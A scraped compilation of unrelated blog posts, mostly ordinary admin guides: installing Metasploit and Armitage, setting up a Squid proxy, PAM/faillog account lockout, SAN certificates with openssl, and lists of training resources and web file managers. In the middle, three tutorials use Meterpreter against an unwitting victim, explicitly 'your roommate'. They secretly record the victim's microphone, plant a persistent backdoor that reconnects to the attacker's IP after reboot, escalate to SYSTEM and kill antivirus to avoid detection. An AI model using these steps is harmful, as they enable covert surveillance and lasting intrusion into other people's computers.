vim /usr/local/share/metasploit-framework/config/database.yml

Enter the following text in to the file keeping the spacing and using the values used for creating the user and database:

production:
 adapter: postgresql
 database: msf
 username: msf
 password: 
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

To load the variable for the database configuration file for the current user:

source /etc/profile
source ~/.bash_profile

Execute Metasploit msfconsole for the first time so it initializes the schema for the database for the first time as your current user and not as root:

msfconsole

Metasploit for Development and Contribution

If you wish to develop and contribute to the product you can follow the additional steps here Metasploit Dev Environment . For this you will need a GitHub account and you will fork the project in to your own account. I personally keep my dev copy of Metasploit in ~/Development folder and after an initial run of msfconsole I keep my database.yml file in ~/.msf4/cofig folder and adjust the MSF_DATABASE_CONFIG variable for it or run msfconsole with the -y option and point it to a YAML file with the correct configuration.

Install Armitage

Since armitage is no longer included with Framework we need to execute some additional steps:

brew install pidof
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
tar -xvzf /tmp/armitage.tgz -C /usr/local/share


 bash  -c "echo  \'/usr/bin/java\'  -jar /usr/local/share/armitage/armitage.jar \$\*" > /usr/local/share/armitage/armitage

perl -pi -e 's/armitage.jar/\/usr\/local\/share\/armitage\/armitage.jar/g' /usr/local/share/armitage/teamserver

Link Scripts

ln -s /usr/local/share/armitage/armitage /usr/local/bin/armitage

ln -s /usr/local/armitage/teamserver /usr/local/bin/teamserver

One important thing to take into consideration, for using Armitage and many of the modules provided in Metasploit you need to run them as root. Do to the way variables are handled when using the sudo command to invoke msfconsole or Armitage you need to give it the -E option:

# For launching Armitage
sudo -E armitage

# For launching msfconsole
sudo -E msfconsole

Installing Metasploit Framework on Ubuntu 14.04 LTS and Debian 7

This Guide covers the installation of Metasploit Framework OSS Project on Ubuntun Linux LTS. If you do not wish to run the Open Source version or set up a development environment and do not mind giving your email address to Rapid 7 for marketing I would recommend downloading their comercial installer from http://www.metasploit.com/ Installing DependencieWe start by making sure that we have the latest packages by updating the system using apt-get:

sudo apt-get update
sudo apt-get upgrade

Now that we know that we are running an updated system we can install all the dependent packages that are needed by Metasploit Framework:

sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev

Installing a Proper Version of Ruby

The distribution sadly does not comes by default with a proper version of Linux for us to use with Metasploit Framework and we will have to download and compile a proper one. There 2 mains ways recommended for this are using RVM or rbenv (Do not install both choose one or the other).

Installing Ruby using RVM:

curl -L https://get.rvm.io | bash -s stable
source ~/.rvm/scripts/rvm
echo "source ~/.rvm/scripts/rvm" >> ~/.bashrc
source ~/.bashrc
rvm install 2.1.5
rvm use 2.1.5 --default
ruby -v

Installing Ruby using rbenv:

cd ~
git clone git://github.com/sstephenson/rbenv.git .rbenv
echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc
echo 'eval "$(rbenv init -)"' >> ~/.bashrc
exec $SHELL

git clone git://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build
echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc
exec $SHELL

rbenv install 2.1.5
rbenv global 2.1.5
ruby -v

Once the packages have been install we need to install the required Ruby libraries that metasploit depends on:

sudo gem install bundler 

Installing Nmap

One of the external tools that Metasploit uses for scanning that is not included with the sources is Nmap. Here we will cover downloading the latest source code for Nmap, compiling and installing:

mkdir ~/Development
cd ~/Development
svn co https://svn.nmap.org/nmap
cd nmap
./configure
make
sudo make install
make clean

Configuring Postgre SQL Server

We start by switching to the postgres user so we can create the user and database that we will use for Metasploit

sudo -s
su postgres

Now we create the user and Database, do record the database that you gave to the user since it will be used in the database.yml file that Metasploit and Armitage use to connect to the database.

createuser msf -P -S -R -D
createdb -O msf msf
exit
exit

If you experience problems with the database setup this fedora guide offers a good guide for troubleshooting and setup https://fedoraproject.org/wiki/Metasploit_Postgres_Setup

Installing Metasploit Framework

We will download the latest version of Metasploit Framework via Git so we can use msfupdate to keep it updated:

cd /opt
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework

Install using bundler the requiered gems and versions:

cd metasploit-framework 
bundle install

WARNING: Currently there is a bug in Metasploit Framework with Symlinks: https://github.com/rapid7/metasploit-framework/issues/4602

Lets create the links to the commands so we can use them under any user and not being under the framework folder, for this we need to be in the metasploit-framework folder if not already in it:

cd metasploit-framework
sudo bash -c 'for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done'

Metasploit for Development and Contribution

If you wish to develop and contribute to the product you can follow the additional steps here Metasploit Dev Environment . For this you will need a GitHub account and you will fork the project in to your own account. I personally keep my dev copy of Metasploit in ~/Development folder and after an initial run of msfconsole I keep my database.yml file in ~/.msf4/cofig folder and adjust the MSF_DATABASE_CONFIG variable for it or run msfconsole with the -y option and point it to a YAML file with the correct configuration.

Installing armitage:

curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage-latest.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

Lets create the database.yml file that will contain the configuration parameters that will be use by framework:

sudo nano /opt/metasploit-framework/config/database.yml

Copy the YAML entries and make sure you provide the password you entered in the user creating step in the password field for the database:

production:
 adapter: postgresql
 database: msf
 username: msf
 password: 
 host: 127.0.0.1
 port: 5432
 pool: 75
 timeout: 5

Create and environment variable so it is loaded by Armitage and by msfconsole when running and load the variable in to your current shell:

sudo sh -c "echo export MSF_DATABASE_CONFIG=/opt/metasploit-framework/config/database.yml >> /etc/profile"

source /etc/profile

First Run

Now we are ready to run Metasploit for the first time. My recommendation is to run it first under a regular user so the folders create under your home directory have the proper permissions. First time it runs it will create the entries needed by Metasploit in the database so it will take a while to load.

msfconsole

How to Remotely Record & Listen to the Microphone on Anyone’s Computer

So many of you responded positively to my post about using the keylogger, as well as my post regarding turning on the webcam, that I decided that you might enjoy another similar hack. In this article, we will enable the audio recording capability on the remote system of your roommate.

Once again, let’s fire up Metasploit from BackTrack and embed the Meterpreter on the remote or victim system. There are a number of ways of doing this, so check back to my earlier posts to see how to install it via amalicious clickable link, a malicious Microsoft Office document or Adobe Acrobat file, and more.

How to Record Computer Audio Remotely

From here, we should have a Meterpreter prompt on our system that reflects the control panel of the Meterpreter on the remote victim system.

Here we have almost total control of their system. We can turn off their antivirus system, embed a software keylogger, turn on their webcam, etc. In this case, we will use a script that turns on the sound recording on our roommate’s computer system and enables us to play back this recording at a later time.

Step 1: Find the sound__recorder.rb Script

As this script is relatively new (2010), let’s make certain that your version of Metasploit has the sound recorder script. First, open a second terminal and navigate to the following directory.

root@bt > cd /opt/metasploit/msf3/scripts/meterpreter

Once we are in this directory, simply do a listing of all files by typing:

root@bt: /opt/metasploit/msf3/scripts/meterpreter ls -l

The script should appear among the list of meterpreter scripts. If it doesn’t, you can either update your Metasploit by typing in the msfconsole:

msf > msfupdate

Or you can download the script here.

Make sure that you save it to the directory/opt/metasploit/msf3/scripts/meterpreter.

Step 2: Run sound__recorder

Now that we have the script in the proper directory, let’s run it. First, let’s look at the help file by typing:

meterpreter > run sound_recorder -h

Notice that we have just a couple options. We can specify the number of 30 second intervals to record with the –i switch and the directory to save the recorded file to with the –l switch. So, let’s record 15 minutes (30 x 30 seconds = 15 minutes) of our roommate and save the file in the /etcdirectory. We can do this by typing:

meterpreter > run sound_recorder -i 30 -l /etc

Step 3: Play Back the Recording

When the recording has completed and run its course, the Meterpreter will save the recording to a file on our system in the directory we specified, or in this case the /etc directory.

Now we simply need to run that audio file in an audio player and we can hear everything that was going on in our roommate’s room during that 15 minutes.

This could be fun! Who knows what might be on that 15 minutes of recording every Saturday night!

How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone’s PC

Most of my recent posts have addressed using Metasploit’s Meterpreter and what we can do once we have embedded it on the victim’s system. This includes remotely installing a keylogger, enabling the webcam, enabling the microphone and recording, disabling the antivirus software, among many other things. The list is almost unlimited.

Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result, many of you have written me asking whether we can maintain or persist the Meterpreter on the victim system.

The answer is an unequivocal “Yes!”

We can embed the Meterpreter and then come back later—even after the victim’s computer has been rebooted—and reconnect to our little backdoor or listener. I’m dedicating this post to showing you how to do this.

Getting Started

Let’s assume that you have been successful in embedding the Meterpreter on the victim’s system, and that you have a screen that looks like the screenshot below. If you’re not sure how to do this, check out some of my previous posts for help.

Now, let’s get started.

Step 1: Run the Persistence Script

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victim’s system. First let’s take a look at the options that are available when we run this scrip by using the –h switch.

At the Meterpreter prompt, type the following:

meterpreter > run persistence -h

We can see in the screenshot above that…

–A switch starts a matching handler to connect to the agent.
-With the -L switch we tell the system where to place the Meterpreter on the target system.
-The –P switch tells the system what payload to use (Windows/Meterpreter/reverse_tcp is the default, so we won’t use this switch).
-S starts the agent on boot with system privileges.
-The -U switch starts the agent when the user (U) logs on.
-The -x switch starts the agent when the system boots.
-With the –i switch we can indicate the time interval between each connection attempt.
-The -p switch indicates the port, and finally…
-The –r switch indicates the IP address of our ( r ) system running Metasploit.

Here we will use the –A, -L, -x, -i, -p, and –r switches.

Type at the Meterpreter prompt:

meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113

This command then will run the persistence script that will start a matching handler (-A), place the Meterpreter at c:\\ on the target system (-L c:\\), starts the listener when the system boots (-x), checks every 30 seconds for a connection (-i 30), connects on port 443 (-p 443), and connects to the local system (ours) on IP address 192.168.1.113.

When we run this command, this is what we should see.

Step 2: Opening a Second Session

We can see that we have opened a Meterpreter session on the victim system.

We return to our Metasploit prompt, by typing:

meterpreter > background

This will return us to the msf prompt, where can now type:

msf exploit(ms08_067_netapi) > sessions –i

We see above that now we have two or more sessions running on the victim system (I actually have three sessions running on this victim) as the persistent Meterpreter has opened a second session on the system.

Step 3: Testing

This is all very nice, but the key here is whether the Meterpreter will reconnect to our system even after the target system reboots. We can test this by typing;

meterpreter > reboot

This will reboot the target/victim machine and if we are successful, the Meterpreter will reconnect to our system.

Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 30 seconds until it has successfully open a session for us.

Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again to wreak havoc!

How to Kill and Disable Antivirus Software on a Remote PC

In some of my past articles, I’ve shown numerous ways of embedding a listener/rootkit on a remote system, including buffer overflows of the operating system, getting the victim to click on a link to our malicious website, and sending a malicious Microsoft Office and Adobe Acrobat file.

In each case, we’ve embedded a listener/rootkit that gives us control over the system. Metasploit has a powerful listener called Meterpreter that enables us to control the system, send more commands, pivot from the victim to other systems, elevate our privileges, and many other things, as we will see.

My next few posts will focus on how to use the Meterpreter in various powerful ways. Today, we will focus on how to use the Meterpreter to disable the antivirus protection on our victim system, which is more advanced than simply bypassing the antivirus program, as I wrote about last time.

Disabling is necessary because the next time the system is scanned by the victim’s antivirus software, it’s likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.

So…fire up Metasploit and let’s get hacking!

Step 1: Getting Started

I’m assuming you have already embedded your Meterpreter listener by one of the many methods I’ve outlined in my earlier posts, and that you have a Meterpreter prompt as it appears in the screenshot below.

Before we can begin to kill the AV software, we need to escalate our privileges.

Usually, when we embed a listener on the victim’s system, the listener will only have the privileges of the user who provided us with a gateway to their system by clicking on the malicious website, Office doc, Abobe PDF, etc.

That user most often has limited rights or privileges to the system. Unlimited rights to do anything on the system is held by the administrator or system administrator (or sysadmin for short).

We need to escalate our privileges from the user to sysadmin to have our way with this computer.

Step 2: Checking the User

Before we start the process of escalation, let’s check what user we are logged in as. Type:

meterpreter > getuid

This will return the ID of the user we are logged in as. If we are anything but the sysadmin, we’ll need to escalate to kill the antivirus software.

Step 3: Escalate Privileges

Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin. Simply type getsystem at the Meterpreter prompt.

meterpreter > getsystem

Notice that Metasploit responds with “…got system (with technique 1)“. Metasploit has multiple methods to escalate privileges and it tries each of them out until one works.

In our case, it was successful with technique 1.

Step 4: Check That We Are Sysadmin

Now that Metasploit has told us that it has escalated our privileges to sysadmin, let’s make sure. Type:

meterpreter > getuid

As you can see in my screenshot above, the victim responds with NT AUTHORITY\SYSTEM, the syadmin user!

Congratulations! You can now have your way this victim.

Step 5: Kill the AntiVirus Software

Now that we have unlimited rights to this system, let’s kill the antivirus software. Metasploit has a Ruby script called killav.rb. We simply run that script from the Meterpreter prompt and it will kill the system’s antivirus software.

Make certain to start the script with the keyword run. Type:

meterpreter > run killav.rb

Notice from the screenshot above that the killav.rb script not only killed the antivirus process, but also the open command prompt.

Now that we have killed the antivirus process, we can remain hidden within their system and do as we please with little or no chance of being detected.

In upcoming blogs, we will explore more adventures with the power of our embedded listener/rootkit with sysadmin privileges. There is no limit what we can do now!

Securing The Human (STH) – Developer Security Awareness Training – Videos

By educating everyone involved in the software development process including developers, architects, managers, testers, business owners, and partners, you reduce the chances that your organization will become a victim of today’s data security threats and ensure your team can properly build defensible applications from the start. STH.Developer provides the pinpoint software security awareness training that your team needs when they need it most, all from the comfort of their own desks.

Training modules are listed below and average 7-10 minutes in length. Select a module below to preview a portion of its contents.

Training Modules

OWASP Modules

• Introduction
• Injection Flaws
• Authentication
• Session Management
• Cross Site Scripting
• Insecure Direct Object Reference
• Security Misconfiguration
• Insecure Cryptographic Storage
• Insufficient Transport Layer Protection
• Missing Functional Level Access Control
• Cross Site Request Forgery
• Using Known Vulnerable Components
• Unvalidated Redirects and Forwards

Software Development Life Cycles (SDLC)

• SDLC Introduction
• Waterfall Model
• Agile Development
• DevOps
• Conclusion

For more info check: https://www.securingthehuman.org/developer/index

Whitepapers, Reports and Guides from Center for Internet Security

Whitepapers & Reports from Center for Internet Security
http://msisac.cisecurity.org/resources/reports

Industry Reports

• Center for Internet Security 2013 Annual Report
• Verizon 2014 Data Breach Investigations Report
• Sophos Security Threat Report 2014
• Symnatec Internet Security Threat Report 2014
• Getting Ahead of Advanced Threats: Achieving Intelligence-Driven Information Security
• Cyberspace Policy Review

MS-ISAC General and Non-Technical Whitepapers

• New and Emerging Trends in Mobile Online Shopping: How to Minimize Risks

MS-ISAC Technical Whitepapers

• NEW! Private and Public Key Cryptography and Ransomware
• Guide to DDoS Attacks
• Malware Analysis: Trojan Kazy
• SQL Injection: Stephanie Reetz – MS-ISAC Security Operations Center (SOC) Analyst
• Zero Access Trojan: Daniel Wallmeyer – MS-ISAC Security Operations Center (SOC) Analyst
• Blackhole Exploit Kit 2.0: Stephanie Reetz – MS-ISAC Security Operations Center (SOC) Analyst

National Cyber Security & Communications Integration Center (NCCIC)

• Emerging Threats: Publishing Software
• NCCIC Bulletin on Multifunction Printer Vulnerabilities
• NCCIC Bulletin on Holiday Phishing and Online Cyber Scams
• NCCIC Advisory: Bin Laden Phishing Scams
• NCCIC Advisory: Sony Playstation Network Compromise
• NCCIC Advisory: Targeted Tax Filing Phishing Attacks

Cyber Threat Intelligence Coordination Group (CTICG)

• Building a Communication Bridge Between Cyber and Physical Security
• Metadata: A Backdoor Into Organizations
• Cyber Crime Executive Briefing
• CEO’s Guide to Cyber Crime
• Web 2.0 Security for Businesses and Employees
• Windows Zero Day Exploit Targeting Siemens SIMATIC WinCC and PCS7 Platforms
• Information and Recommendations Regarding Unauthorized Wire Transfers Relating to
  Compromised Cyber Networks

Other

• Google’s Ingress Game will likely increase reports of suspicious activity
• How to Secure Your Facebook Account
• Presidential Policy Directive on Critical Infrastructure Security and Resilience
• Presidential Executive Order on Improving Critical Infrastructure Cybersecurity

Guides (Booklet Format)

• Getting Started Guide
• Firewall Guide
• Acceptable Use Guide
• Erasing and Disposal Guide
• Guidelines for Backing Up Information
• Cyber Incident Response Guide
• Risk Management Guide
• Cyber Crime Technical Guide
  
• Guides (Print Format)
• Firewall Guide
• Acceptable Use Guide
• Erasing and Disposal Guide

Additional Resources

1. CyberTab: Free Tool to Help Assess Cost of Cyber Attack
2. Threatsaurus
3. Cyber Guidebook for Counties
4. Cyber Security Handbook for Cities and Counties
5. White papers
6. TheCISecurity Video Playlist on Youtube

Free Trade Magazine Subscriptions & Technical Document Downloads

Browse through our extensive list of free Information Technology magazines, white papers, downloads and podcasts to find the titles that best match your skills; topics include technology, IT management, business technology and e-business. Simply complete the application form and submit it. All are absolutely free to professionals who qualify.

http://cybrary-it.tradepub.com

Free IT Cyber Security, Systems Administrator and Network Administrator Trainings and Classes

Cybrary is a free and open source, online information technology (IT) and cyber security training environment for the world. We are dedicated to keeping the world’s IT professionals prepared for this ever changing industry and its technologies. You can learn almost anything IT and security related for free, and you can help others to do the same. Take a look at what you can learn:

Begin Free Systems Administration Training Here:

• CompTIA A+ – An introduction to computer hardware, software and security implementation, maintenance and support. This is the class to begin with, if you have no experience in IT at all.
• CompTIA Linux+ – Take an in-depth look at administration in the open source operating system leader, Linux.
• Microsoft Office 365 Web Content Management: SharePoint – Learn how to administer the leading organizational collaboration software on the market today, SharePoint.
• Virtualization Management – Virtualization is driving Information Technology to new heights. Go deep into how to deploy, implement, manage and maintain the industry’s leading VM platforms.
• Microsoft Certified Solutions Associate (MCSA) – This class helps you to master Microsoft’s most current Server environment and helps you achieve one of the top certifications in Systems Administration.
• Project Management Professional (coming soon)

Begin Free Network Administration Training Here:

• CompTIA Network+ – An introduction to networking and preparation for this highly trusted and highly recognized industry certification.
• Information Technology Infrastructure Library (ITIL) Foundation – Learn the framework behind IT service management best practices.
• Cisco Certified Network Associate (CCNA) – Prove your worth in networking with this in-depth training class on how to implement, manage and maintain routers and switches.
• CompTIA Cloud+ – The Cloud+ is an overview on how to create, secure and manage cloud based systems, applications and hardware.
• CCNP (coming soon)

Begin Your Free Cyber Security Training Journey Here:

• CompTIA Security+ – In this class you will gain a stable foundation of Cyber Security and Information Assurance as well as prepare for the security industry’s most sought after entry level certification.
• Cryptography – Learn how to secure data communications through the use of cryptographic messaging and practices.
• Ethical Hacking and Penetration Testing – Learn the fundamentals of hacking and penetration testing. Think like a hacker, so that you can stop them from intruding into your systems. This class will help prepare you for the industries most sought after certification, EC-Council’s CEH.
• Computer and Hacking Forensics – In order to catch cyber criminals, you have to learn how to retrace their steps and correctly acquire and document the evidence. Also prepare for the industry leading CHFI certification from the EC-Council.
• CompTIA Advanced Security Practitioner (CASP) – This advanced certification covers deep topics that span across both Cyber Security as well as Information Assurance.
• Certified Information Systems Security Professional (CISSP) – The leading certification for Information Assurance management personnel. This course is both very deep, and very broad. Be ready to study hard!
• Post Exploitation – Learn what to do to maintain your presence and to gather intelligence after you have exploited the target system.
• Social Engineering and Manipulation – Take a look inside the form, function and flow of a highly skilled social engineering cyber-attack. Learn to protect the human element.
• Python for Security Professionals – Learn the commands and functions that every aspiring cyber security professional must know from Python. This isn’t a full programming course, but rather a course designed for non-coders who are developing their career in security.
• Metasploit – An in-depth look inside the Metasploit Framework intended to show you how to use it to its full potential.
• Malware Analysis and Reverse Engineering – An introduction to reverse engineering malware. This class is for experienced Cyber Security professionals, generally at least two to three years in the field is preferred.
• Advanced Penetration Testing by Georgia Weidman – This class is for advanced Cyber Security professionals. You will learn in depth, hands-on, advanced hacking techniques to help you target and penetrate almost any highly secured environment.

More information can be found on: http://www.cybrary.it

Setup Squid HTTP Proxy and Configure it on a Ubuntu Server

1.Installing the proxy
http://en.kioskea.net/faq/804-installing-an-http-proxy-server-squid

To install Squid type the following command in a terminal:

sudo aptitude install squid

2.Configuring the proxy

Configuration of Squid is done by editing the following file: /etc/squid/squid.conf
To edit this file enter the following command:
vi /etc/squid3/squid.conf

2.1.Naming the proxy

Its important that Squid knows the name of the machine. To do this, locate the line visible_hostname.
For example, if the machine is called ubuntu insert:
visible_hostname ubuntu

2.2 Choosing the Port

By default, the proxy server will use port 3128. To choose another port, locate the line:
http_port 3128

and change the port number, for example:
http_port 3177

2.3.Choosing the interface

By default the proxy server will listen on all interfaces. For security reasons, its better to put it on your local network only. For example, if the network card connected to your LAN has IP 10.0.0.1, change the line:
http_port 10.0.0.1:3177

2.4. Allow the use non-standard ports

By default, Squid allows HTTP traffic only on specific ports (e.g. 80). This can cause problems on websites using other ports.

-For example, http://toto.com:81/images/titi.png will be blocked by Squid

To avoid this deadlock, find the line http_access deny! Safe_ports and the edit it to: # http_access deny! Safe_ports

2.5 Authentification

How to Setup Transparent Squid Proxy Server in Ubuntu

If you wish to use authentication with your proxy you will need to install apache2 utilities

sudo aptitude install squid squid-common apache2-utils

To add your first user you will need to specify -c

sudo htpasswd -c /etc/squid.passwd first_user

Thereafter you add new users with

sudo htpasswd /etc/squid.passwd another_user

Edit the squid config file

sudo vi /etc/squid/squid.conf

Set the the authentication parameters and the acl

auth_param basic program /usr/lib/squid3/ncsa_auth /etc/squid.passwd
auth_param basic children 5
auth_param basic realm NFYE Squid proxy-caching web server
auth_param basic credentialsttl 3 hours
auth_param basic casesensitive off

acl users proxy_auth REQUIRED

acl sectionx proxy_auth REQUIRED

http_access allow users

3.Starting the Proxy

Restart the proxy to apply the modifications you made. Type:
sudo /etc/init.d/squid restart

Miscellaneous
Server logs

The proxy logs are located in: /var/log/squid/access.log

Changing the size of the cache

-The Squid cache is enabled by default, which helps accelerate the loading of some pages.
-The default allocated size is 100 MB (found in /var/spool/squid)
-To change its size, edit the /etc/squid/squid.conf file.
-Find the line: # cache_dir ufs /var/spool/squid 100 16 256
-Edit it. You can change the value 100 to whatever you want (e.g. 200 for 200 MB):
cache_dir ufs /var/spool/squid 200 16 256

How to Faillog

I cam across an interesting command – faillog

With faillog you can lock a user’s account after x number of failed log in attempts.

HOWEVER – it is not so straight forward – see man pam_tally

In order to enable this option you need to edit a few of the pam configuration files located in /etc/pam.d

What makes this confusing, as with sudo, THE ORDER OF RULES IS CRITICAL.

So, we can not just add a few lines at the bottom of the file, we need to add them in order

In particular, using any editor, open /etc/pam.d/common-auth and add the line AT THE TOP OF THE FILE:

auth required pam_tally.so per_user magic_root onerr=fail

Use the silent option if you do not want pam_tally to give error messages.

auth required pam_tally.so per_user magic_root onerr=fail silent

You may set the number of failed log in attempts and lock out time by either adding additional options to the above line or using faillog

sudo faillog -m 3

To unlock an account use

faillog -u login_name -r

Or set a time with the fail log command, the -l option sets the lock time.

faillog -m 3 -l 3600

Using faillog with ssh

Now to use this with ssh we need to also edit both /etc/pam.d/sshd and /etc/ssh/sshd_config

First, using any editor, open /etc/pam.d/sshd

Look for the line “@include common-auth” , we need to add auth required pam_tally.so per_user onerr=fail

auth required pam_tally.so per_user onerr=fail
@include common-auth

By adding this line before include common-auth we over ride the “magic_root” setting in common-auth.

Once a user is logged in, we need the magic_root option so that failed sudo attempts do not lock us out of root access. But because sshd runs as root, we need to over ride this option in /etc/pam.d/sshd – clear as mud ?

If it does not make sense, read the man pages, open a shell, and log in as root (so you do not loose root access), and test these options, see what happens when as your admin user you try sudo -i and ssh localhost.

Next, using any editor, open /etc/ssh/sshd_config

Change the “ChallengeResponseAuthentication no” to yes (in Ubuntu UsePAM yes was default).

ChallengeResponseAuthentication yes
UsePAM yes

If the pam_tally module locks your account, you will still be able to log in with ssh keys.

So it may be a good idea to make sure you have a working set of ssh keys before you enable this option

Multiple Names on One SSL Certificate

Configuring ssl requests with SubjectAltName with openssl

With Multiple Domain Certificates you can secure a larger number of domains with only one certificate. Subject Alternative Names are a X509 Version 3 (RFC 2459) extension to allow an SSL certificate to specify multiple names that the certificate should match. SubjectAltName can contain email addresses, IP addresses, regular DNS host names, etc. This uses an SSL feature called SubjectAlternativeName (or SAN, for short).

Generate the Certificate Request File

For a generic SSL certificate request (CSR), openssl doesn’t require much fiddling. Since we’re going to add a SAN or two to our CSR, we’ll need to add a few things to the openssl conf file. You need to tell openssl to create a CSR that includes x509 V3 extensions and you also need to tell openssl to include a list of subject alternative names in your CSR.

Create an openssl configuration file which enables subject alternative names (openssl.cnf):In the [req] section. This is the section that tells openssl what to do with certificate requests (CSRs).
Within that section should be a line that begins with req_extensions. We’ll want that to read as follows:
[req]
distinguished_name = req_distinguished_name
req_extensions = v3_req

This tells openssl to include the v3_req section in CSRs.
Now we’ll go own down to the v3_req section and make sure that it includes the following:

[req_distinguished_name]
countryName = Country Name (2 letter code)
countryName_default = US
stateOrProvinceName = State or Province Name (full name)
stateOrProvinceName_default = MN
localityName = Locality Name (eg, city)
localityName_default = Minneapolis
organizationalUnitName = Organizational Unit Name (eg, section)
organizationalUnitName_default = Domain Control Validated
commonName = Internet Widgits Ltd
commonName_max = 64

[ v3_req ]
# Extensions to add to a certificate request
basicConstraints = CA:FALSE
keyUsage = nonRepudiation, digitalSignature, keyEncipherment
subjectAltName = @alt_names

[alt_names]
DNS.1 = kb.example.com
DNS.2 = helpdesk.example.org
DNS.3 = systems.example.net
IP.1 = 192.168.1.1
IP.2 = 192.168.69.14

Note that whatever we put here will appear on all CSRs generated from this point on: if at a later date you want to generate a CSR with different SANs, you’ll need to edit this file and change the DNS.x entries.
Generate a private key

You’ll need to make sure your server has a private key created:

openssl genrsa -out san_domain_com.key 2048

Where doman is the FQDN of the server you’re using. That’s not necessary, BTW, but it makes things a lot clearer later on.
Create the CSR file

Then the CSR is generated using:

openssl req -new -out san_domain_com.csr -key san_domain_com.key -config openssl.cnf

You’ll be prompted for information about your organization, and it’ll ask if you want to include a passphrase (you don’t). It’ll then finish with nothing much in the way of feedback. But you can see that san_domain_com.csr has been created.

It’s nice to check our work, so we can take a look at what the csr contains with the following command:

openssl req -text -noout -in san_domain_com.csr

You should see some output like below. Note the Subject Alternative Name section:

Certificate Request:
Data:
Version: 0 (0x0)
Subject: C=US, ST=Texas, L=Fort Worth, O=My Company, OU=My Department, CN=server.example
Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (2048 bit)
Modulus (2048 bit): blahblahblah
Exponent: 65537 (0x10001)
Attributes:
Requested Extensions: X509v3
Basic Constraints: CA:FALSE
X509v3 Key Usage: Digital Signature, Non Repudiation, Key Encipherment
X509v3 Subject Alternative Name: DNS:kb.example.com, DNS:helpdesk.example.com
Signature Algorithm: sha1WithRSAEncryption
blahblahblah

So now we’ve got a shiny new CSR. But, of course, we have to sign it.

Self-sign and create the certificate:

openssl x509 -req -days 3650 -in san_domain_com.csr -signkey san_domain_com.key
-out san_domain_com.crt-extensions v3_req -extfile openssl.cnf

Package the key and cert in a PKCS12 file

The easiest way to install this into IIS is to first use openssl’s pkcs12 command to export both the private key and the certificate into a pkcs12 file:

openssl pkcs12 -export -in san_domain_com.crt -inkey san_domain_com.key
-out san_domiain_com.p12

Import the certificate

Copy the file over to the server and import it there. You need to import it into the local computer’s certificate store. Open IIS Manager, select your server on right pane, double click Server Certificates, and click Import under Actions on the right pane. Browse to your *.p12 file and enter the p/w (allow cert to be exported checked).

Now you can go to one of your servers, edit the “bindings” and select this certificate for SSL. However, you will probably find the “Host name” box greyed out, which is something IIS routinely does for SSL bindings.

The fix is simple: Start mmc, add the Certificates snap-in for the local computer, find your certificate under “Personal”, double click on it, go to Details and click “Edit Properties…”. Now you get to add a “friendly name” to the certificate, and there’s the key. Set the name to “*.domain.com” and go back to the IIS Management Console. Vollalla! Now you can edit the Host name.

After this fix, you can change the SSL binding for all those web servers to use the same certificate and IP address, and also to use name-based virtual host selection!

Configure SSL Settings

Configure SSL settings if you want your site to require SSL, or to interact in a specific way with client certificates. Click the site node in the tree view to go back to the site’s home page. Double-click the SSL Settings feature in the middle pane.

10 Free and powerful File Managers for the web

if you looking for Free and powerful File Managers Based on jQuery , Ajax, php and Mootools ready to use in your web projects and easy to customize , take a look at this list with Free and powerful File Managers using jQuery/Ajax/php . All File Managers Based on jQuery ,Ajax, php and Mootools that allows you to preview, upload and modify files and folders via the browser.

1.MooTools based FileManager

A MooTools based File-Manager for the web that allows you to (pre)view, upload and modify files and folders via the browser.

Features :

• Browse through Files and Folders on your Server
• Rename, Delete, Move (Drag&Drop), Copy (Drag + hold CTRL) and Download Files
• View detailed Previews of Images, Text-Files, Compressed-Files or Audio Content
• Nice User Interface
• Upload Files via FancyUpload (integrated Feature)
• Option to automatically resize big Images when uploading
• Use it to select a File anywhere you need to specify one inside your Application’s Backend
• Use as a FileManager in TinyMCE

2.eXtplorer -PHP and JavaScript based File Manager

eXtplorer is a web-based free File Manager built with PHP and JavaScript . eXtplorer is released under a dual-license You can choose whether you want to use eXtplorer under the Mozilla Public License (MPL 1.1) or under the GNU General Public License (GNU/GPL).
eXtplorer compatible with PHP 4.3 on the server and an up-to-date browser with Javascript enabled to run. But here is one more thing I like about eXplorer is you can use eXtplorer as a file manager for your local files or use eXtplorer to login to the FTP server (like net2ftp) and work as if you were using an FTP client.

Features :

• browse your directories & files on the server like FTP server
• edit, copy, move (Drag&Drop), delete files from server
• search, upload and download files,
• create and extract archives,
• create new files and directories

3. AjaXplorer

AjaXplorer is a web-based free File Manager which is easy-to-install file explorer for remotely managing files on a web server. Its “rich client” layout and actions make it accessible to any end-user for a variety of purposes: file management/sharing, photo gallery, code browsing, etc. Only PHP (4 or 5) is necessary, no database needed.

Features :

• Rename/Copy/Move/Delete/Download files or folders
• Upload multiple files and track status with progress bar (Flash required and no https)
• Create folders and empty files
• Edit Text files and code files (js, php, html, java, sql, perl), syntax is highlighted in the editor
• View Images online, preview images in the list, diaporama of a given folder
• Listen to MP3s online without downloading them
• View Flash videos (FLV) online and full screen.
